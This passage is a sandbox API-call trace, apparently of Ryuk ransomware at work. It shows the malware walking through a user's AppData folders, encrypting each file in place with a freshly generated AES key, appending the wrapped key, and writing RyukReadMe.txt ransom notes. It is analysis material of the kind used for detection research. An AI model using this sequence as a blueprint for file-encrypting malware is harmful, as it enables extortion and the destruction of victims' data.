hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4c, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x4c, lpOverlapped=0x0) returned 1 [0150.206] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0150.206] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x4c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x50) returned 1 [0150.206] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.206] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x50, lpOverlapped=0x0) returned 1 [0150.206] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0150.206] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0150.206] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0150.206] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0150.206] CloseHandle (hObject=0x194) returned 1 [0150.223] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.226] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.226] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.227] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.227] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.227] SetLastError (dwErrCode=0x0) [0150.227] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.227] GetLastError () returned 0xb7 [0150.227] CloseHandle (hObject=0x190) returned 1 [0150.227] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.227] SetLastError (dwErrCode=0x0) [0150.227] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.228] GetLastError () returned 0xb7 [0150.228] CloseHandle (hObject=0x190) returned 1 [0150.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.229] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.229] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.229] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.229] SetLastError (dwErrCode=0x0) [0150.229] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.229] GetLastError () returned 0x0 [0150.229] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0150.230] CloseHandle (hObject=0x190) returned 1 [0150.230] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.230] SetLastError (dwErrCode=0x0) [0150.230] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.230] GetLastError () returned 0xb7 [0150.230] CloseHandle (hObject=0x190) returned 1 [0150.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.231] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.231] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.231] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.231] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml", dwFileAttributes=0x80) returned 1 [0150.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.232] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=168) returned 1 [0150.233] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=168) returned 1 [0150.233] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0150.233] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.233] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.233] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xa8, lpOverlapped=0x0) returned 1 [0150.234] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0150.234] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xa8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xb0) returned 1 [0150.234] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.234] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xb0, lpOverlapped=0x0) returned 1 [0150.234] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0150.234] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0150.234] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0150.234] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0150.234] CloseHandle (hObject=0x194) returned 1 [0150.250] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.254] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.254] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.255] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.255] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.255] SetLastError (dwErrCode=0x0) [0150.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.255] GetLastError () returned 0x0 [0150.255] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0150.256] CloseHandle (hObject=0x190) returned 1 [0150.256] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.256] SetLastError (dwErrCode=0x0) [0150.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.256] GetLastError () returned 0xb7 [0150.256] CloseHandle (hObject=0x190) returned 1 [0150.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.257] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.257] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.257] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.257] SetLastError (dwErrCode=0x0) [0150.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\speech\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.257] GetLastError () returned 0x0 [0150.257] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0150.258] CloseHandle (hObject=0x190) returned 1 [0150.258] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.258] SetLastError (dwErrCode=0x0) [0150.258] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.258] GetLastError () returned 0xb7 [0150.258] CloseHandle (hObject=0x190) returned 1 [0150.258] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.259] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.259] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.259] SetLastError (dwErrCode=0x0) [0150.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.259] GetLastError () returned 0x0 [0150.259] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0150.260] CloseHandle (hObject=0x194) returned 1 [0150.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0150.260] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.260] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.260] SetLastError (dwErrCode=0x0) [0150.260] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.260] GetLastError () returned 0x0 [0150.260] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0150.261] CloseHandle (hObject=0x198) returned 1 [0150.261] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0150.261] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0150.261] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0150.262] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0150.262] SetLastError (dwErrCode=0x0) [0150.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.262] GetLastError () returned 0x0 [0150.262] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0150.263] CloseHandle (hObject=0x198) returned 1 [0150.263] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.263] SetLastError (dwErrCode=0x0) [0150.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.263] GetLastError () returned 0xb7 [0150.263] CloseHandle (hObject=0x198) returned 1 [0150.263] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0150.263] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0150.263] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0150.263] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0150.263] SetLastError (dwErrCode=0x0) [0150.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.264] GetLastError () returned 0x0 [0150.264] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0150.264] CloseHandle (hObject=0x198) returned 1 [0150.264] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.264] SetLastError (dwErrCode=0x0) [0150.265] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.265] GetLastError () returned 0xb7 [0150.265] CloseHandle (hObject=0x198) returned 1 [0150.265] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0150.265] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0150.265] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0150.265] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0150.265] SetLastError (dwErrCode=0x0) [0150.265] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.265] GetLastError () returned 0x0 [0150.265] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0150.266] CloseHandle (hObject=0x198) returned 1 [0150.266] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0150.266] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0150.266] SetLastError (dwErrCode=0x0) [0150.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.266] GetLastError () returned 0xb7 [0150.266] CloseHandle (hObject=0x194) returned 1 [0150.267] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.267] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.267] SetLastError (dwErrCode=0x0) [0150.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.267] GetLastError () returned 0xb7 [0150.267] CloseHandle (hObject=0x190) returned 1 [0150.267] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.267] SetLastError (dwErrCode=0x0) [0150.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.267] GetLastError () returned 0xb7 [0150.267] CloseHandle (hObject=0x190) returned 1 [0150.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.268] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.268] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.268] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.269] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm", dwFileAttributes=0x80) returned 1 [0150.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.269] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=20635) returned 1 [0150.269] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=20635) returned 1 [0150.269] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x4f79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.269] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0150.270] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.270] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0150.270] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, 